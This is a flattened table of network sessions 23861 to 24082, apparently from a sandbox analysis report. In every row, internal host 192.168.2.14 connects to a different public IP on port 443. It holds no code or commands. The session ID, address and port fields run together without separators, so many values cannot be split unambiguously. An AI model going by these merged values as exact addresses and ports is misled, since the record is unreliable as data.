                                      23861192.168.2.1446170220.112.126.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23862192.168.2.1452474207.239.66.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23863192.168.2.144974246.184.245.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23864192.168.2.1457060221.199.61.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23865192.168.2.144609220.134.91.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23866192.168.2.1433294126.79.165.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23867192.168.2.143457641.189.245.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23868192.168.2.144694442.172.102.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23869192.168.2.143476274.227.28.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23870192.168.2.143997892.130.194.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23871192.168.2.1453404125.205.159.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23872192.168.2.143818478.23.161.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23873192.168.2.1450456209.193.42.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23874192.168.2.1449462221.129.57.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23875192.168.2.144026651.187.51.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23876192.168.2.1437064142.132.2.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23877192.168.2.145419619.48.242.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23878192.168.2.1435534152.131.89.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23879192.168.2.145767036.33.232.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23880192.168.2.143457867.55.188.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23881192.168.2.145145452.101.25.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23882192.168.2.143313838.112.243.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23883192.168.2.1450162108.153.133.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23884192.168.2.1441326185.19.109.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23885192.168.2.1442084152.254.157.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23886192.168.2.1443262141.217.4.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23887192.168.2.1459000103.219.220.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23888192.168.2.1445714141.223.120.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23889192.168.2.1460154143.254.206.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23890192.168.2.1456356161.212.36.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23891192.168.2.144573032.207.33.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23892192.168.2.143744287.193.251.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23893192.168.2.1447982119.226.0.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23894192.168.2.144978446.190.0.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23895192.168.2.1450512116.150.27.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23896192.168.2.1443018199.170.114.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23897192.168.2.14379388.28.87.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23898192.168.2.144469486.235.249.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23899192.168.2.1452784193.86.25.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23900192.168.2.1451536109.5.67.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23901192.168.2.145227452.249.141.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23902192.168.2.144474466.106.110.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23903192.168.2.14579545.19.74.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23904192.168.2.143586840.69.91.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23905192.168.2.1442214117.46.231.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23906192.168.2.1447144107.0.85.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23907192.168.2.1435006100.186.94.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23908192.168.2.145283413.216.218.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23909192.168.2.1444688167.211.157.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23910192.168.2.1445070118.139.45.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23911192.168.2.1434128161.245.244.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23912192.168.2.1433140169.218.196.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23913192.168.2.144668848.199.139.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23914192.168.2.144161036.100.179.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23915192.168.2.1448532119.196.13.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23916192.168.2.144250848.94.143.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23917192.168.2.143729834.118.100.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23918192.168.2.144478066.59.216.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23919192.168.2.1433222176.68.229.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23920192.168.2.143869042.219.160.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23921192.168.2.144257070.143.153.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23922192.168.2.1453556132.140.142.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23923192.168.2.1441310133.147.246.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23924192.168.2.144174436.255.124.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23925192.168.2.145868898.189.128.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23926192.168.2.143772667.56.147.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23927192.168.2.1452376146.128.203.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23928192.168.2.1458498165.243.13.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23929192.168.2.1444352167.25.135.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23930192.168.2.1452040217.106.187.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23931192.168.2.145659490.226.7.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23932192.168.2.144506486.253.17.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23933192.168.2.144284059.24.135.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23934192.168.2.1433098188.25.109.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23935192.168.2.1445322114.91.1.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23936192.168.2.1448484220.220.71.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23937192.168.2.144598814.235.240.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23938192.168.2.144494813.67.187.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23939192.168.2.1443510160.109.235.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23940192.168.2.1440106138.91.80.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23941192.168.2.1434762193.142.170.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23942192.168.2.144431025.185.219.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23943192.168.2.143873444.69.64.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23944192.168.2.1446170134.151.22.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23945192.168.2.1457778198.44.80.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23946192.168.2.1451456120.227.176.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23947192.168.2.1440546122.50.99.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23948192.168.2.144601665.101.171.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23949192.168.2.1441740160.104.11.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23950192.168.2.143947441.246.249.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23951192.168.2.144134678.196.68.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23952192.168.2.1442842155.145.167.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23953192.168.2.144399298.237.48.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23954192.168.2.144943646.40.105.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23955192.168.2.145387065.248.3.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23956192.168.2.144549099.224.204.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23957192.168.2.14506902.166.251.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23958192.168.2.1455854179.241.88.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23959192.168.2.14537104.69.252.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23960192.168.2.145018082.61.31.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23961192.168.2.1451316118.229.61.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23962192.168.2.145199423.198.126.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23963192.168.2.143333250.183.136.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23964192.168.2.1444458121.190.152.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23965192.168.2.1441158147.199.213.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23966192.168.2.145342663.141.109.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23967192.168.2.145111465.224.237.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23968192.168.2.144817058.126.207.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23969192.168.2.1450868169.61.226.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23970192.168.2.1457494194.189.118.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23971192.168.2.1433218105.153.253.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23972192.168.2.1460326197.225.251.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23973192.168.2.144139896.214.254.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23974192.168.2.145013289.171.64.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23975192.168.2.1435430122.122.199.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23976192.168.2.1447226188.202.4.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23977192.168.2.1457406197.218.213.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23978192.168.2.1445700146.182.162.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23979192.168.2.144198480.132.111.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23980192.168.2.144560039.201.135.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23981192.168.2.145362666.249.15.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23982192.168.2.144115067.50.240.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23983192.168.2.145735687.10.82.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23984192.168.2.143985840.185.76.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23985192.168.2.1451064143.225.46.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23986192.168.2.1439484198.35.141.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23987192.168.2.1451938135.42.158.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23988192.168.2.1452994177.183.5.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23989192.168.2.1453788212.76.122.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23990192.168.2.145316225.153.253.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23991192.168.2.1444478155.238.82.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23992192.168.2.1442102207.74.7.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23993192.168.2.1446664118.111.42.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23994192.168.2.143499450.146.108.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23995192.168.2.143935485.22.94.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23996192.168.2.14516889.94.166.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23997192.168.2.1442428106.141.126.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23998192.168.2.1452094168.39.82.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23999192.168.2.1437228210.6.198.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24000192.168.2.1450744120.181.119.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24001192.168.2.143463443.251.238.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24002192.168.2.144687094.1.21.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24003192.168.2.1449504135.146.167.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24004192.168.2.143348880.170.239.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24005192.168.2.1456774150.226.120.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24006192.168.2.1435194162.255.99.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24007192.168.2.1456638188.28.106.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24008192.168.2.144603825.10.8.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24009192.168.2.1435836192.233.157.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24010192.168.2.144485688.75.149.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24011192.168.2.145744859.121.48.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24012192.168.2.1439038168.108.156.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24013192.168.2.1435844188.142.88.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24014192.168.2.143674632.55.15.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24015192.168.2.1437022151.32.246.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24016192.168.2.1432908109.244.190.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24017192.168.2.1445788191.65.210.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24018192.168.2.145380897.133.5.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24019192.168.2.145476470.101.212.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24020192.168.2.1442644155.127.231.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24021192.168.2.145921637.34.93.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24022192.168.2.1442466206.184.185.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24023192.168.2.1446090111.41.72.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24024192.168.2.1450192190.152.254.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24025192.168.2.1451822128.120.217.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24026192.168.2.1436628124.63.137.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24027192.168.2.145300462.253.204.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24028192.168.2.1441998129.112.48.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24029192.168.2.1454474172.70.119.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24030192.168.2.143594677.49.114.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24031192.168.2.145010649.196.237.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24032192.168.2.1434824191.48.213.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24033192.168.2.144075688.178.127.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24034192.168.2.1440684198.147.5.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24035192.168.2.1442074172.56.206.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24036192.168.2.1460448137.188.111.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24037192.168.2.1441128163.98.75.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24038192.168.2.146042457.27.54.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24039192.168.2.143354865.155.251.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24040192.168.2.144783261.213.56.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24041192.168.2.1439862164.137.103.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24042192.168.2.1433282198.181.101.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24043192.168.2.143351039.108.89.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24044192.168.2.1433192193.165.222.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24045192.168.2.1436668216.155.126.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24046192.168.2.144904073.38.84.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24047192.168.2.1440162163.4.187.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24048192.168.2.1449756183.18.29.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24049192.168.2.145578024.151.250.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24050192.168.2.1452678208.65.244.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24051192.168.2.145942680.98.182.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24052192.168.2.1449516149.112.51.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24053192.168.2.1458344133.123.226.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24054192.168.2.143653458.63.155.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24055192.168.2.144868096.32.150.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24056192.168.2.144939042.12.217.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24057192.168.2.1434290152.156.238.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24058192.168.2.1444838196.42.166.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24059192.168.2.144907245.25.74.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24060192.168.2.145714031.32.187.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24061192.168.2.1434584195.47.11.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24062192.168.2.1460482117.146.186.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24063192.168.2.1453976197.156.196.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24064192.168.2.145796841.38.31.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24065192.168.2.145271442.153.25.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24066192.168.2.1436590101.128.250.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24067192.168.2.1438720135.62.9.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24068192.168.2.1453692188.0.249.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24069192.168.2.1433300146.163.253.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24070192.168.2.1442074110.26.236.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24071192.168.2.144620434.249.204.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24072192.168.2.143498848.19.201.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24073192.168.2.143433686.12.207.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24074192.168.2.1449426133.88.172.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24075192.168.2.143513681.158.96.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24076192.168.2.143431286.238.166.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24077192.168.2.144391862.72.204.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24078192.168.2.144369446.58.181.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24079192.168.2.1437646217.125.5.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24080192.168.2.1451220173.62.56.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24081192.168.2.1457396177.106.65.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24082192.168.2.144552034.85.15.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
